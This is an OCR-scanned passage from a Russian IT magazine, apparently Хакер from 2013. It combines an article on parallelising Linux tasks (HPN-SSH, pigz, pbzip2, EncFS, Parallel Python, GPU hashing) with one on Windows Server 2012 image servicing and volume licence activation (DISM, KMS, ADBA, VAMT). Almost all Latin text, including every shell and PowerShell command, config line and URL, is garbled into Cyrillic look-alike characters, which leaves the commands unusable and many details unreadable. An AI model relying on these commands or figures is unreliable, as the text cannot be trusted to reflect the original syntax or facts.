Можно запустить вручную несколько копий 
в разных терминалах, но можно подключить 
Рагайе!: 


$ саё 91гесфогу_115%.%хе | рага11е1 += 
гзупс -а\у --1пс1иае="/{}*" --ехс1иаде=« 


ТУРБОРЕАКТИВНОЕ КОПИРОВАНИЕ 
ФАИЛОВ ПО $$5Н 

Как правило, для синхронизации директорий 
между двумя хостами Н5упс запускают поверх 
55Н. Ускорив 55Н-соединение, ускорим и ра- 


К$узСиага начетырехъядерной системе 


боту Взупс. А ЭЗН можно ускорить за счет ис- 
пользования набора патчей ОрепззН  НРМ, 
устраняющих ряд узких мест в механизме бу- 
феризации серверной и клиентской части ЗЗН. 
Кроме того, в НРМ используется многопоточная 
версия алгоритма АЕЗ-СТВ, что повышает ско- 
рость шифрования файлов (активируется флагом 
-оС1рИег=ае$[128| 192 | 256]-с*г). Чтобы  про- 
верить, установлен ли у тебя Ореп5$Н НЕМ, вбей 
в терминале 


$ эй -\ 


и ищи вход подстроки НРМ. Если у тебя оказался 
обычный Ореп55Н, установить НР№-версию мож- 
но так: 


$ эи4о ада-ар*-геро$1%огу рра:+= 
м-гоцезпе]1 /ореп5$И-Прп 

$ зи4о ар*-веф ирдафе -у 

$ зи4о ар*-веф 1п5{а11 ореп$$5И-зегуег 


Затем добавь в /еёс/$5И/з5На_сопйв строки: 


НРМО15аб1еа по 
ТсрКс\уВи+Ро11 уе$ 
НРМВиРег$17е 8192 


МопеЕпаб1е4 уе$ 


после чего перезапусти УЗ$Н. Снова создай 
Азупс/5ЗН/ЗСР-подключение и оцени выигрыш. 


СЖАТИЕ ФАЙЛОВ 

Все те ускорения, что мы проделывали выше, ос- 
нованы на одновременном запуске нескольких 
копий одного и того же процесса. Планировщик 
процессов операционной системы разруливал 
эти процессы между ядрами (процессорами) 
нашей машины, за счет чего мы и получали уско- 
рение. Вернемся к примеру, где мы сжимали не- 
сколько файлов. Но что, если нужно сжать один 


5\ар: 79.6 МВ / 4.7 СВ 


Воттак выглядит Сопку 


огромный файл, да еще и медленным 67р2? 
К счастью, сжатие файлов очень хорошо поддает- 
ся параллельной обработке — файл разбивается 
на блоки, и они сжимаются независимо. Однако 
стандартные утилиты, вроде д7р и 672, такого 
функционала не имеют. Благо есть много сторон- 
них продуктов, умеющих это. Рассмотрим толь- 
ко два из них: параллельный аналог др — р!др 
(216.пе!/рю7) и аналог Бр2 — рбдр2 
(сотргезз!юп.са/ро712). Две эти утилиты доступ- 
ны в стандартных репозиториях Убити. 

Использование р!ог абсолютно ничем не от- 
личается от работы с 97фр, кроме возможности 
указать количество потоков и размер блока. Раз- 
мер блока в большинстве случаев можно оставить 
дефолтный, а как количество потоков желательно 
указать число, равное (или на 1-2 больше) коли- 
честву процессоров (ядер) системы: 


$ р1е7 -с -р5 БасКир.Жаг › += 
р157-Баскир.фаг. 87 


Выполнение этой команды над файлом 
баскир1аг весом в 620 Мб заняло у меня 12,8 с, 
результирующий же файл весил 252,2 Мб. Обра- 
ботка того же файла с помощью 07: 


$ в71р -с БаскКир.Жаг > «= 
871р-Баскир.аг.57 


заняла 43 с. Результирующий файл при этом ве- 
сил на 100 Кб меньше, по сравнению с предыду- 
щим: 252,1 Мб. Опять же мы получили почти четы- 
рехкратное ускорение, что не может не радовать. 
Р1ог умеет распараллеливать только сжатие, 
но не распаковку, чего не скажешь про рб7р2 — 
который умеет и то и другое. Использование ути- 
литы аналогично ее непараллельному варианту: 


$ рЬ71р2 -с -р5 БасКир.Жаг › «= 
рЬ71р-Баскир.Фаг.572 


ХАКЕР 10 /177/ 2013 


Обработка того же файла Баскираг заняла 
у меня 38,8 с, размер результирующего файла — 
232,8 Мб. Сжатие с использованием обычного 
брир2 заняло 1 мин 53 с, при размере файла 
в 232,7 Мб. 

Как я уже говорил, с рб7фр2 можно ускорить 
и распаковку. Но тут нужно учесть один ню- 
анс — параллельно распаковывать можно только 
то, что до этого было запаковано параллельно, 
то есть только архивы, созданные с помощью 
рЬ7р2. Распаковка в несколько потоков обычного 
67р2-архива будет произведена в один поток. Ну 
иеще немного цифр: 
. обычная распаковка — 40,1 с; 
. распаковка в пять потоков — 16,3 с. 


Осталось только добавить, что архивы, соз- 
данные с помощью р/ог и рб7р2, полностью со- 
вместимы с архивами, созданными с помощью их 
непараллельных аналогов. 


ШИФРОВАНИЕ 

По умолчанию для шифрования домашней дирек- 
тории в Убижи и всех производных дистрибути- 
вах используется еСгурИ$. На момент написания 
статьи еСгурИ$ не поддерживал мультипоточно- 
сти. И это особенно заметно в папках с большим 
количеством маленьких файлов. Так что если 
у тебя многоядерник, то еСгурИ$ использовать 
нецелесообразно. Лучшей заменой будет ис- 
пользование систем ат-сгурф или ТгчеСгур“. 
Правда, они могут шифровать только целые раз- 
делы или контейнеры, но зато поддерживают 
мультипоточность. 

Если тебе нужно зашифровать только опреде- 
ленную директорию, а не целый диск, то попро- 
буй ЕпсЕРЗ (м/мим.ага0.пе/епсР то). Она очень 
похожа на еСгурИ$, но работает, в отличие от по- 
следней, не в режиме ядра, а с использованием 
РОЗЕ, что делает ее потенциально медленнее, 
чем еСгурН$. Но она поддерживает мультипоточ- 
ность, поэтому на многоядерных системах будет 
выигрыш в скорости. К тому же она очень проста 
в установке (доступна в большинстве стандарт- 
ных репозиториев) и использовании. 

Нужно всего-то выполнить 


$ епсф5$ -/.сгур*-гам -/сгур® 


ПАРАЛЛЕЛЬНЫЙ РУТНОМ 


Главные параллели 


ввести парольную фразу, и все: в .сгур-гами бу- 
дут лежать зашифрованные версии файлов, 
а в сгур — незашифрованные. Чтобы размонти- 
ровать ЕпсР5, выполни: 


$ РЕизегтоип* -и ^/пате 


Конечно, все это можно автоматизировать. 
О том, как это сделать, можно почитать здесь: 
мкг. агсй!пих.ога/тпаех.рир/ЕпсЕ$. 


ЛЮБЛЮ СМОТРЕТЬ, КАКЯДРАПАШУТ 
Загружать-то процессор на полную мы загружа- 
ем, но нужно иногда и мониторить его работу. 
В принципе, почти каждый дистрибутив имеет 
хорошую оснастку для мониторинга использо- 
вания процессора, включая информацию о каж- 
дом отдельном ядре или процессоре. В Кибити, 
например, КЗу$@цага очень удачно отобража- 
ет текушую загруженность ядер (смотри скрин 
«КЗу$@нцага на четырехъядерной системе»). 

Но есть и другие интересные утилиты, позволя- 
ющие созерцать работу процессора. Любителям 
консольных решений по душе придется Мор — 
более красочный и интерактивный аналог 1ор. 
Еще советую обратить внимание на знаменитый 
СопКу (сопку.зоигсетогае.пе{) — мощный и легко 
настраиваемый системный монитор. Очень лег- 
ко его настроить для мониторинга загруженности 
каждого ядра и процессора в целом. Для каждого 
ядра можно вывести отдельный график. На скрин- 
шоте можешь посмотреть мою конфигурацию ути- 
литы. Все файлы здесь: ра{ебт.сот/6бЗма0з 6. 
В Сети, кстати, полно интересных конфигов, кото- 
рые можно взять за основу и допилить. 

Но эти утилиты дают лишь информацию о за- 
груженности, чего часто может оказаться недо- 
статочно. Мр${а{ из набора зуз$а{ (БИ.1у/зуз$1а1) 
выдает более интересную информацию, как, на- 
пример, время простоя каждого ядра, время, по- 
траченное на ожидание ввода/вывода, или вре- 
мя, затраченное на обработку прерываний. 


СРУНЕТОЛЬКО ДЛЯ ИГР 

Не секрет, что современные СРУ обладают очень 
большими вычислительными мощностями. Но из- 
за того, что ядра СРИ имеют особую архитектуру 
и ограниченный набор доступных команд, СРУ 
пригоден лишь для решения узкого круга задач. 


Для распараллеливания РУПоп-приложений или скриптов отлично под- 
ходит модуль Рагайе! РУпПоп. Он очень удобен и прост в использовании. 


Все, что нам нужно, — создать сервер для задач: 


1троге рр 


Зоб_зегмег = рр.5егуег() 


МЕО 


По умолчанию он будет настроен на одновременный запуск <коли- 
чество сри> задач. Теперь можно просто посылать на этот сервер за- 


дачи, и они будут обрабатываться параллельно: 


Пакетный фильтр МРЕ 
из состава МеВЗр 6.0 
позволяет добиться 
максимальной произ- 


+1 = ]об_зегуег. зибт1* (Рипс1, агё$1, аерфипс$1, тоач1е$1) водительности на мно- 
+2 = ]об_зегуег. зибт1* (Рипс1, агё$2, аерфипс$1, тоач1е$1) гоядерных системах 
+3 = ]об_ зегуег. зибт1* (Рипс2, агё$3, аерфипс$2, тоач1е$2) за счет параллельной 

многопоточной об- 
где Типс# — задачи к выполнению; агд$# — аргументы; аебТипс$# — спи- работки пакетов с ми- 
сок функций, от которых зависимы функции задач; тодщез# — модули, нимальным числом 
от которых зависимы функции задач. блокировок. 
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Раньше выполнять вычисления на СРУ могли 
только гуру шейдеров. Сейчас же производи- 
тели видеокарт делают все возможное, чтобы 
упростить жизнь энтузиастов и разработчиков, 
желающих задействовать мощности графических 
процессоров в своих проектах: СУБВА от ММШИА, 
АМО Ругебиеат, открытый стандарт ОрепСЕ 
(гиммкре4!а.ога/\мКИОрепС1.). С каждым годом 
вычисления на СРУ становятся все доступнее 
и доступнее. 


Вычислениехешей 

На сегодняшний день из запускаемых на СРЧУ за- 
дач популярнее всего, наверное, вычисление хе- 
шей. А все это из-за Вцсот-майнинга, который, 
собственно, и заключается в вычислении хешей. 
Большинство Вйсот-майнеров доступны под 
Ипих. 

Если ты хочешь майнить Вксот’ы и если твой 
графический процессор поддерживает ОрепСЕ 
(если поддерживает СУРА, то и ОрепСЕ тоже), 
тогда рекомендую обратить внимание на Баттег 
(ПИрз://айпи6.сотЛике-и/Ьаттег: он быстр, 
удобен и функционален, хоть и не так уж прост 
в настройке. 

Но не Вйсот’ом единым живем. Ничто не ме- 
шает использовать мощности СРУ для брут- 
форса хешей (с целью узнать свой забытый 
пароль, конечно же, не более). В решении этой 
задачи хорошо зарекомендовала себя утилита 
осНазйса{-р!и$ (Пазпса.пе/осйазйса{-р!и$) — 
настоящий комбайн по бруту хешей. Умеет под- 
бирать хеши МО5 с солью и без соли, ЗНА-1, 
МТЕМ, кешированные пароли домена, пароли 
баз данных МуЗСЕ(, пароли САЧЬ, и это еще даже 
не половина списка. 


Шифрованиена СРО 

Очень интересное применение мощностей гра- 
фических процессоров представили нам студен- 
ты Вэйбинь Сунь (Мет Зип) и Син Линь (Хто 
п) из университета Юты в рамках проекта КСРУ 
(БИЛуДсУИМАЯЙ.). 

Суть проекта заключается в переносе ис- 
полнения некоторых частей кода ядра ШИпих 
на СУБА-совместимый СРУ. Первым разра- 
ботчики решили вынести на СРИ алгоритм АЕЗ. 
К сожалению, на этом развитие проекта и оста- 
новилось, хотя разработчики все же обещали 
продолжить разработку. 

Но всё это никак не помешает использовать 
уже существующую наработку для ускорения 
АЕ$-шифрования в еСгурЁ$ и ат-сгурф, жаль 
только, что ядра версии 3.0 и выше не поддер- 
живаются. 


Мониторингпроизводительности СРО 

А почему бы и нет? Конечно, загруженность каж- 
дого ОРУ ядра узнать не удастся, но хоть какую- 
то информацию о происходящем на СРУ полу- 
чить можно. Программка СУВА-7 (почти аналог 
\ММпао\м5-программы СРИ-7), кроме разной стати- 
ческой информации о СРЧЦ, умеет получать и ди- 
намическую: текущую скорость обмена данными 
между графическим процессором и машиной, 
а также общую производительность всех ядер 
СРУ в флопсах. 


ВЫВОДЫ 

Многоядерные или же многопроцессорные ра- 
бочие станции достаточно давно вошли в нашу 
повседневную жизнь — пора менять и наш 
однопоточный подход при работе с ними. Ведь 
распараллеливание задач на таких системах 
дает нам огромный выигрыш времени, в чем мы 
и убедились. == 
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Обновление большого парка серверов и десктопов — за- 
дача, отбирающая много времени и сил, ведь необходимо 
установить не только ОС, но и драйверы, приложения, а так- 
же активировать лицензии. Весь процесс можно на порядок 
упростить, автоматизировав основные операции. 


ИНТЕГРИРУЕМ ДРАЙВЕРЫ ИОБНОВ- 
ЛЕНИЯ В УСТАНОВОЧНЫЙ ОБРАЗ 
\М8/2012 
Стандартные драйверы, поставляемые вместе 
с установочным образом \М/Ипао\мз, вряд ли по- 
крывают и половину потребностей, поэтому после 
инсталляции системы их приходится устанавли- 
вать вручную. Добавим сюда пакеты обновлений 
и приложения, и становится понятно, почему вечно 
не хватает времени. Если систем много, лучше все 
интегрировать, это на порядок упростит введение 
в строй как клиентских хостов, так и серверов. 

В состав РомегЗпей 3.0, который идет 
с М/т8/2012, входит модуль (БИЛу/КТи801) си- 
стемы обслуживания образов ГИЗМ (Верюутет 
|паде Зегистад апа Мападетепт), содержащий 26 
командлетов. Таким образом, теперь имеем две 
возможности для интеграции драйверов: команд- 


ную утилиту О1$М и командлеты Ромегпей. Пер- 
вый вариант, в общем-то, не изменился со времен 
\М$а и Зе7еп, поэтому подробнее остановимся 
на сценарии с РомегЗПе!. Хотя стоит отметить, 
что принцип работы этих инструментов одинаков, 
отличаются лишь вводимые команды. В случае 
с Ромег5пе! их проще запомнить, а при частом 
использовании можно создать скрипт. 

Начинаем. В \№Мт7/2008 перед началом работы 
импортируем модуль О!$М: 


Р5> ТирогЕ-Моди1е "С: \Ргоргат Е11е$ += 
(х86)\М1падом$ К1*5\8.9\Аз5ез5тепЕ += 
апа Бер1оутепе К1*\Бер]1оутепе Тоо1$\- 
ата64\ОтТ$М" 


Установочный \ММ-образ (находится в подка- 
талоге зоигсе$) на самом деле содержит несколь- 
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ко версий ОС, на первом этапе нам необходимо 
выбрать нужную и смонтировать в каталог. Смо- 
трим список ОС: 


Р5> бее-И1паом$Ттаяе -ТтавеРаЕИ Т$50\+- 
5оигсе$ \1п${а11.м1т 


Выбираем нужную версию и смотрим соответ- 
ствующее значение шаех. Создаем подкаталог 
|таде, в него будем монтировать образ. 


Р5> Моцп*-и1пдом$Ттаде -РафИ Ттаде ++ 
-ТтагеРаЕИ зоигсез\1п${а11.м1т += 
-Тпаех 2 


Теперь в указанном каталоге видим несколько 
подкаталогов и файлов, которые можно изме- 
НЯТЬ. 

Добавим драйверы. Лучше, когда под рукой 
имеется эталонная система, откуда можно ско- 
пировать все необходимое. Для поиска драйвера 
запустим команду, например, отберем те драйве- 
ры, которые написаны М$: 


Р5> бее-им1пдом$Ог1мег -Оп11пе -а11 | «= 
мпеге рго\14егпаме -таЕсй < 
'ИТСГО$ОЕ ' 


Создаем каталог Оийуег$ и складываем в него 
все МЕ-файлы, содержащие описания драй- 
веров. Если драйвер доступен в виде САВ- или 
ЕХЕ-файла, его необходимо вначале развер- 
нуть и извлечь 1МЕ Используя командлет Адо- 
М/Ипаом/5Опуег, добавляем ИМЕ-файл в образ: 
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Р5> Ааа-иИ1паом$Ог1уег -РафН Тмтаре «> 
-Ог1уег Ог1уег$ -Кесиг$е 


Параметр -Весигзе указывает на рекурсивный 
обход всех папок в поисках драйверов. Все драй- 
веры, устанавливаемые на хб4 \МИпдо\м/$, должны 
быть подписаны, использование неподписанных 
драйверов вызовет ошибку. Чтобы переопре- 
делить требование, следует добавить параметр 
-Рогсе/Упзопед. 

При помощи командлета Ааа-\Мпао\ммзРаскаде 
можно добавить в образ пакеты, представляю- 
щие собой САВ- или МЗУ-файлы, это может быть 
пакет локализации или обновления. 


Р5> Ааа-И1паом$РасКаве -Раф{И Ттаде ‹= 
—РасКадеРа{! с:\РасКазе$ ‹= 
-Тепогеспеск 


Собственно, это все. При помощи Озтоит- 
\МпаомиИтаде размонтируем каталог, сохранив 
изменения: 


Р5> 015тоип*-и1паом$Ттаве -РаЕИ «= 
Тмазе -5ъауе 


В комплект модуля ОМ входит командлет 
баме-\Мпао\мзИтаде, позволяющий записать все 
изменения, но он не размонтирует образ. Его ис- 
пользуют для сохранения промежуточных резуль- 
татов. 

Если нужна поддержка специфических драй- 
веров во время загрузки, все описанные выше 
операции следует провести и для файла 5оигсе$\ 
Бооф мт. 

Когда все закончено, создаем новый загру- 
зочный образ. Для этих целей используем любое 
привычное приложение или утилиту ОЗСОМОС, 
идущую в комплекте АОК (находится в подкатало- 
ге РЕТоо!$). 


РЕТоо1$> озса1тмя -п -м -Бс: \Т5О\Боо*\-= 
е{Р$Бооф.сот С:\1$0 С: \\м11п8.15$0 


АСТУЕ О1ВЕСТОВУ ВАЗЕО АСТИУАТОМ 

ОС \Мпаом/$, начиная с \!$а/2008, требует акти- 
вацию продуктов даже в случае использования 
корпоративного ключа. Чтобы упростить эту про- 
цедуру для большого количества систем, пред- 
ложен новый инструмент под названием служба 
управления ключами (КМ$, Кеу Мападетет 


Вы ерите компоненты, которые вы хотите установку 


Щелкните имя компонента для получения дополнительных сведений. 
[М АррсаНоп СограНЙйу Тос!КИ (АСТ) 


[М средств развертывания Размер: 24,4 МБ 


Давай накатим 


АррИсаНоп СотраНЫИЙу Тос!КИ (АСТ) 


я 


№1п4омз Ромек$Не11 
<С> Корпорация Майкрософт, 2012. Все права защищены - 


Р$ С:\Шзекз\Йдминистратор» Сбе&-—М1п4омзТтаде -—ТтадеРае В С:\$етр\1$0\зоиксез\1тп5$а11 .м1т 


[паех :1 

Нате : Мзааомз Зекоек 2012 ЗЕВУЕВЗТАЯНОЯВОСОВЕ 
Фезск1ре1оп : М1п4омз Зекоек 2012 $ЕВУЕВЗТЯНОЯВОСОВЕ 
б12е = ? 468 832 553 Бубез 


[пех :2 
Нате : Мапаомз Зекоек 2012 З$ЕВУЕВУТАНОЯВО 
Фезск1рЕ10т = Мапаомз Зекуек 2012 З$ЕВУЕВЗТЯНОЯ ВО 


б12е = 12 178 ?35 296 Бубез 


1п4ех : 3 

Нате : Чапаомз Зекчуек 2012 5ЕВУЕКОЙЯТЯСЕНТЕВСОВЕ 
Фезск1рЕ1от : М1зп4омз Зекуек 2012 ЗЕВУЕВОЯТЯСЕНТЕВСОВЕ 
б12ге : ? 458 066 604 Ъусез 


|паех : 4 

Нате : ЧМапаомз Зекуек 2012 З$ЕВУЕВОЯТЯСЕНТЕВ 
Резск1р&10оп : М1п4омз Зекоек 2012 ЗЕВУЕВОЯТЯСЕНТЕВ 
б1ге = 12 1723 60? 104 увез 


Р$ С:\Шзекз\Йдминистратор> „. 


Смотрим список ОС в образе 


Зегмсе), позволяющий управлять активацией 
корпоративных версий посредством новых типов 
ключей: многопользовательской активации (МАК, 
Мире Асйуайоп Кеу) и КМ$. Системам (физи- 
ческим и виртуальным) теперь нет необходимо- 
сти индивидуально подключаться к серверу М$, 
вся процедура активации происходит локально 
с КМ$ и управляется админом. 

Процесс выглядит так. Неактивированные кли- 
енты автоматически подключаются к серверу КМ$ 
(1688/ТСР) каждые два часа, обращаясь для его 
поиска к службе ОМ$. В последующем они долж- 
ны не реже одного раза в 180 дней (срок действия 
активации) обновлять статус, для этого они при- 
мерно раз в 7 дней обращаются к КМ$. После чего 
отсчет срока действия активации обнуляется. 

Но есть особенности. Для активации при по- 
мощи КМ$ в сети должно присутствовать мини- 
мальное количество физических компьютеров 
(так называемый порог активации, минимум 5 
серверов и 25 клиентов), после достижения ко- 
торого и производится активация. Для настройки 
узла КМ$ используется команда $!тодг.мб$. Сама 
служба КМ$ нетребовательна к ресурсам, поэто- 
му сервер может выполнять любую другую роль. 

В \М/п8/2012 появилась новая роль Ас\ме 
Онестогу Вазеа АсйуаНоп (АШВА), позволяющая 
автоматически активировать все компьютеры, 
подключенные к домену (на уровне леса), и в по- 
следующем сохранять этот статус, пока система 
входит в домен. Как и в случае с КМ$, состояние 
активации клиентов, использующих АБВВА, сохра- 


Перед началом работы 
Тип установки Рол 


Выбор сервера 


Выбор ролей сервера 
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Атрибуты, имеющие 
отношение кактивации, 
хранятся в контей- 
нере СМ=Асй\майоп 
ОЦес$, СМ=МгсгозоН $РР, 
СМ=5егмсез, 
СМ=Сопйдиганоп. 


няется в течение 180 дней. Вместо ТСР клиенты 
используют [ГОАР, поэтому нет и каких-то специ- 
фических настроек. Самым большим плюсом 
АБВА является отсутствие порога активации, по- 
этому возможен постепенный переход. Для ран- 
них ОС М/паом/5 по-прежнему требуется КМ5$, 
при этом два способа могут вполне сосущество- 
вать без конфликтов. Клиент \/п8/2012 вначале 
пытается произвести АВВА-активацию, а в случае 
недоступности пробует КМ$ и МАК. 

Для работы АБВА нужно расширить схему АО 
до \Мтао\м$ Зегуег 2012, при этом имей в виду, 
что АВВА нельзя настроить на контроллерах до- 
мена, доступных только для чтения (ВООС). Все 
атрибуты, имеющие отношение к активации, хра- 
нятся в следующем контейнере (его можно про- 
смотреть при помощи 1ар.ехе или АБЗ! ЕЯй): 


СМ№=АсЕ1уа1оп ОБ]ес*$ , СМ=М1сгозоЕ $РР ‚+= 
СМ=5$ег\1се$ , СМ=Сопйвига* Топ , ОС=дота1п ‚ = 
ОС=еТа 


Сервер, на который устанавливается роль, 
должен входить в домен, иначе нужная функция 
будет недоступна (только КМ$). 

Процесс прост. На \\Мп2012 устанавливаем 
роль службы активации корпоративных лицензий 
(Мошите АсйуаНоп Зегмсе$), выбрав соответству- 
ющий пункт в мастере добавления ролей и ком- 
понентов диспетчера сервера и подтвердив уста- 
новку инструментов администрирования. Или 
при помощи Ромег5 Пей: 


КОНЕЧНЫЙ СЕРВЕР 
МИМ-ЕВМ 


Выберите одну или несколько ролей для установки на этом сервере. 


Описание 


Службы активации корпоративных 


ОНСР-сервер 
ОМ№-сервер 


Средства для оценки и устранения проблем с 
совместимостью перед развертыванием новой версии 
Средство миграции пользовательской среды (У$МТ) Млпаом. 


Среда предустановки \МИпдом$ (\МИпдом$ РЕ) лицензий позволяют 
автоматизировать и упростить 
Нурег-\ управление ключами узлов 
службы управления ключами 
(КМ5) и инфраструктурой 
активации ключей многократной 
установки для сети. С помощью 
этих служб можно установить узел 
КМ5 и управлять им либо 
настроить активацию 
корпоративных лицензий для 
присоединенных к домену систем, 
выполняемую на основе Асвуе 
Отескогу. 


Компоненть 
Для АСТ требуется доступ к базе данных. В качестве Веб-сервер (15) 
Набор средств для оценки производительности \Мпа базы данных можно использовать 5ОЁ Зегуег 2005 (в 
том числе экспресс-выпуск) или более поздней версии. 
Вы можете установить $ОЁ Зегуег или использовать 
установленный продукт. 


Доменные службы АсНуе Опесогу 
[М службы оценки МИпдом Сеиериемиения 
Службы Асбуе Онесфогу облегченного доступа » 
Службы МИпдоми$ Зегиег Урдайе Зеглсез 


Службы активации корпоративных лицензий 


Службы печати и документов 


м 
м 
[М Средство активации корпоративных лицензий (МАМТ 
2 
у 
м 


Мсго5оЙ $О( $егуег 2012 Ехргез$ 


Службы политики сети и доступа 
Службы развертывания М/пдо\и$ 


Службы сертификатов Асвуе Отесогу 


Требуется места на диске: 5,3 ГБ 
Доступно на диске: 87,9 ГБ 


С М 88} ВХ | Е О В О М 9 


Службы удаленных рабочих столов 


Установить 


Выбор компонентов во время установки \Мпаом!$ Аззеззтепт апа ВерюутепЕ КИ Установкароли службы активации корпоративных лицензий 
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= \Уоите АсНуаНоп Мападетеп! Тоо! 
Файл Действие Вид Справка 


Фи 


(31 Моште Асбуабоп Мападегпеп Тоо! 
д [9 Ргодиа 
Я Онсе 
Я ММпдом 
(А, РгодисЕ Кеуз 
А Асвме Онесоту-Вазе4 АсНуаНоп 


Средства активации корпоративных лицензий 


Моште АсбуаНоп Мападетепи Тоо! 


Действия 
Моите АсйуаНоп М... ^ 
СоппесЕ фо МАМТ даа... 


Выбор метода активации корпоративных лицензий 


\Месоте то {Пе Уоите Ас/уаНоп Мападетеп: Тоо! 


В ыы Тре Уомте АсНуаНоп Мападетепе Тоо! аЙомуз уоц +0 сепйгаЙу ппападе асНуаНоп о! зирроце. : 
ЕДЕНИТ Вы можете изменить существующую конфигурацию активации корпоративных лицензий или МесгозойЙ ргодисЁ; т уоцг епутоптегЕ ап4 па рз еп у ргодисЕ; мВ ргоЫегтайс йсепзйпд $ прог П=... 


создать новую. Выберите метод, который вы хотите настроить, и сервер, на котором 
установлена служба управления ключами (если она используется). 


Если вам нужно использовать учетные данные, отличающиеся от данных текущей учетной 
записи, то перед продолжением введите имя пользователя и пароль. 


Управление ключами 


продуктов ®) Активация с помощью АсНуе Отесюгу 


Конфигурация О Служба управления ключами (КМб) 


Г] Альтернативные учетные данные (необязательно) 


Имя пользователя: домен\пользователь 


Пароль: ее 


ии корпоративных лицензий 


Настройка средства активации корпоративных лицензий 


Р$> Тп$фа11-М1паом$Ееафиге \о1ите. = 
АсЕ1уа*1оп -Тпс1и4еМапагетеп*Тоо1$ 


Запускаем консоль службы активации корпо- 
ративных лицензий, выбираем используемый ме- 
тод, в мастере предложены оба варианта: АОВА 
или КМ$. На следующем шаге указываем КМ5$- 
ключ, которому можно сразу же задать понятное 
имя, чтобы в последующем было удобно работать 
при большом количестве ключей. И переходим 
к активации ключа. Это можно сделать через ин- 
тернет или по телефону. После репликации новых 
объектов в АВ клиенты с \М/п8 и 2012 будут авто- 
матически активированы. Никаких дополнитель- 
ных настроек не требуется. 

Активировать ключи можно и используя зто. 
\6$, который получил пять новых параметров 
для работы с АВВА: 


{а9-ас*1\уа{1оп-оп11пе [Ргоаис*Кеу] 
{а9-ас*1уа{1оп-арр1у-ве*-11а «= 
[Ргодис*Кеу] 

{[а9-ас*1уа{1оп-арр1у-с1а [Ргоаис*Кеу |= 
[Сопйгта*1опто] 

[ао-11$+ 

/ае1-ао 


Текущий статус активации клиентов проверя- 
ется при помощи команды 


> $1тёг.\65$ -а]м\ 


7] 08 Моште Исептд Керо$ 
{Я лекек Ргодисв Верой 
{Я оиргсаее СпепЕ Масвте 10 Верой 
{9 мынре Асёмабоп Кеу Узаде Верой 
{Я мог дсвуаеч РгодисЕ Верой 
& уоште Асбуанопз Бу Туре 


ь биссез$фиЙу соппес{ед фо бегуег: [ЛАОК] БафаБазе: [пем/] 


Ехрой =... 
Асашге сопйптаноп |... 


Исепзе омеглеми: ВенезН сигеп мем #т... 


\УАМТ тметогу: 
ргодис: 0 


ргодисЕ Кеуз: 0 ип 


Вид › 
Справка › 


Интерфейс Уоште АсНуаНоп Мападетеп{ Тоо! 


АКТИВАЦИЯ ЛИЦЕНЗИЙ 

ПРИПОМОЩИ УАМТ 

Как видишь, АОШВА и КМ$ имеют свои ограниче- 
ния, кроме того, в организации не всегда могут 
быть ключи одного типа. Что же делать в этом 
случае? С АОК поставляется специальное ре- 
шение \АМТ 3.0 (Уоште АсНуайоп Мападетет 
Тоо!), с помощью которого можно управлять аб- 
солютно всеми видами ключей для продуктов МЗ: 
Ащай, МАК, КМ$ и АОВА. Для хранения всей ин- 
формации используется ЗОЕ Зегуег версии 2005 
ивыше. В комплекте АОК идет версия ЗО Зегуег 
Ехрге5$ 2012, которую следует выбрать для уста- 
новки (только в \/\п2012, в других версиях опе- 
рационки БД придется ставить самостоятельно) 
и затем при первом подключении \АМТ указать 
имеющуюся базу данных или создать новую (по 
умолчанию). 

Для активации клиентов \МАМТ использу- 
ет М/М!, который обычно блокируется \М/ИпЧом/$ 
Ргемиай. В случае проблем следует в редакторе 
групповых политик (дартс.тзс) создать новую по- 
литику (Сотрщег Сопйдигайоп\Рой<ез\\Мтао\м5 
Зейта$\Зесийу Зе{нта$\\Ипао\м/$ Егемиай 
мии Айуапсея ЗФесищу), разрешив подключе- 
ние \\/МГ (Ргедейтпеа -— \\Мпаомз$ Мападетет 
шугитещайоп —› А!ом/). 

Список ключей пуст. Выбираем пункт Ргоди‹{ 
кеуз и в контекстном меню Ада ргодис( Кеуз$ за- 
полняем номера ключей или импортируем фай- 
лы ключей, после чего нажимаем кнопку Ада 


БЕЗОПАСНЫ ЛИ АВТОРСКИЕ СБОРКИ? 


Кеу($). Программа проверит действительность 
ключей и по окончании процесса выдаст их спи- 
сок, тип и продукт, к которому относится этот 
ключ. 

Заполняем списки узлов (потребуются пра- 
ва администратора). Выбираем пункт Ргодис$ 
и Озсоуег ргодис{$, здесь необходимо опреде- 
литься со способом добавления: вручную, указав 
имя или |Р-адрес системы (МапиайЙу ещег пате 
ог |Р аадаге$$), автоматически, используя базу 
Асме Опестогу (Зеагсй Тог сотрщег$ т {пе Асйуе 
Онесюгу), поиск компьютеров в рабочей группе 
(Зеагсй Тог сотрщег$ т Пе могкогоир), создать 
-ГРАР-запрос (Зеагсй ми ГОАР аиегу). В каждом 
случае потребуется задать уточняющие параме- 
тры, например домен и фильтр имени компьюте- 
ра. По окончании сканирования узел добавляется 
в базу. Выбираем в меню Ураз{е Псепзе заи$ 
и после проверки получаем статус лицензионной 
информации (имя продукта, активирован, ключ 
и прочее). Для установки ключа на хост перехо- 
дим в шЗа! ргодист Кеу..., выбираем из списка 
нужный и нажимаем шз$а! Кеу. Когда ключ при- 
менен, можно активировать клиент, выбрав пункт 
меню Ас{уае —› Опте асйу=е. В случае успеха 
статус меняется на Асйуге. 

Консоль \/АМТ предоставляет несколько по- 
лезных отчетов, позволяющих упростить админи- 
стрирование: 

. А г Н5к Родис$ Верой (отчет о продуктах 

в группе риска) — показывает список всех 


СИТ ДЛЯ 01$М 


Сегодня очень популярны авторские сборки \\Ипдом5$, включающие, помимо самой ОС (из которой за- 
частую убраны отдельные компоненты и отключены службы), дополнительные приложения, драйверы, 
темы рабочего стола и многое другое. Установка таких сборок автоматизирована, участие пользователя 
сведено до минимума и выполняется за час. Да, это очень удобно: вставил диск и быстро получил рабочую 
ОС со всем необходимым. Но минусов гораздо больше. Например, нарушение стабильности работы, когда 
система падает (обычно в самый неподходящий момент), или снижение производительности без видимых 


Для 01$М доступен < 
(915 тацш.соаер!ех.соп?), 
позволяющий выпол- 
нять многие операции 
в удобной оболочке 

и тем самым освобо- 
дить голову от запо- 
минания всех ключей. 
Текущая версия 3.5 
полностью совместима 
с МАК 7, грядущий 
релиз 4.0 будет совме- 
стим с АОК. 


на то причин. Здесь как раз тот случай, когда достоинство переходит в недостаток, наличие большого ко- 
личества драйверов и приложений, установленных на все случаи (нередко еще и криво), вызывает разного 
рода конфликты. Ведь не всегда сборщик имеет должную квалификацию и возможность протестировать 
сборку на разном оборудовании. Отключение «ненужных», по мнению автора, служб потом вызывает 
проблемы для новичков, которые не могут понять, почему что-то не работает либо работает не должным 
